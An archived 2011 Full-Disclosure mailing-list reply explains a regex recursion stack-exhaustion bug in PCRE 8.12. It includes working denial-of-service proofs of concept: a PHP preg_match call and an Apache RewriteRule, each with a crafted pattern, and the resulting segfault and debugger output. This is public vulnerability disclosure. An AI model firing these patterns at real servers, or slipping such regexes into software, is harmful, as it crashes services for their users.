lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <4EA359A0.6030908@securityreason.com>
Date: Sun, 23 Oct 2011 02:02:40 +0200
From: Maksymilian Arciemowicz <cxib@...urityreason.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: New Opera 11.51 PoC Denial of Service
	(pigtail23)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

stack exhaustion. it's seems to recursion problem for basic regular
expression. the same or similar problem exists in PCRE 8.12, allowing to
crash multiple applications

cx@...4:/www$ cat crash0.php
<?php
preg_match("/((.*)((!?.*)+)\\w+)/iU",str_repeat(" ",4096),$exxx);
?>
cx@...4:/www$ php crash0.php
Segmentation fault

or some times ago for apache,

127# cat .htaccess
RewriteEngine On
RewriteBase   /rcrash
RewriteRule gun((.*){2000,}(\s*){2000,}.*) /ygy
127# curl http://127.0.0.1/rcrash/gun
curl: (52) Empty reply from server

[Mon Jul 11 02:40:39 2011] [notice] child pid 1343 exit signal Illegal
instruction (4)

Program received signal SIGSEGV, Segmentation fault.
0x08097a9b in match (eptr=0xbb777b07 "", ecode=0xbb76ab6f "*\bB",
    offset_top=8, md=0xbfbfe284, ims=0, eptrb=0xbfa02014, flags=2)
    at pcre.c:7997
7997        c = *ecode++ - OP_TYPESTAR;

that is the same problem.

- --
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid                  Maksymilian Arciemowicz (cx) <max@...b.net>
sub   4096R/58BA663C 2010-09-19
-----BEGIN PGP SIGNATURE-----

iQIcBAEBAgAGBQJOo1mUAAoJEIO8+dzW5bUwMBwP/3M0LD5DaXzuwvT3jhmuxi+m
aQ8/66efeFAYqcm8XFTx4xcinA6thDvxV05VHUN1TwJbBUY/m0IatD5WdD3gCY2/
R61fg3zmYZoKg5+aeSCJT3VSJbhQbA8pcQoDQp8BI+AdLv9D1hGu6n8qMC9xF6Lx
4ef/sqTZfsGZObKU1ualRvKa5MWT9N78r8ufDDwxEnDnk6IigrKnnRfsnQsZbboW
i1hGwyJhDNI0s9HJzyT2t0sru3aGdSXXVoKlSkmtfVbhvpmT8gyIWr3xNJZQWXRP
odGNXPJ4/+yKXZh5jjNZ4tFqc4ARkkpG5WxqoLOwVYucTQgcJeh61gt42cMnAnFM
NNKYjhFS1IKiuW8UXWPDB6hoVySBsOArhZK7d6P/h3PsMNGVm1lixfQMX5e1JNQb
5KUu704p1ONDyzC5JWqfdGYwXE3K10sDZJ6K7n0vgEtmfGVX3WKjIybnAlnZ5CT/
7MCo4xGKB7vuMUeZaBInKvLwr/a1LZK1MFMPcu+ypNBLJI6FWG98OsNttpRz2jRz
O0dq0BNAGZR8zTYnd6JD7zTKpk9IIHoQLJjDjTDsxZrOFnLrF6FTqCwUSuTo9ldi
r+T3GU0+dtBTUG34mBPxWSYlGUag6xjLlyOZDpSniSSwj8brsCKuXlOf67Hh2VHW
MfKU/5PxCy6TYZjdAROB
=L6P1
-----END PGP SIGNATURE-----

Download attachment "0xD6E5B530.asc" of type "application/pgp-keys" (3086 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ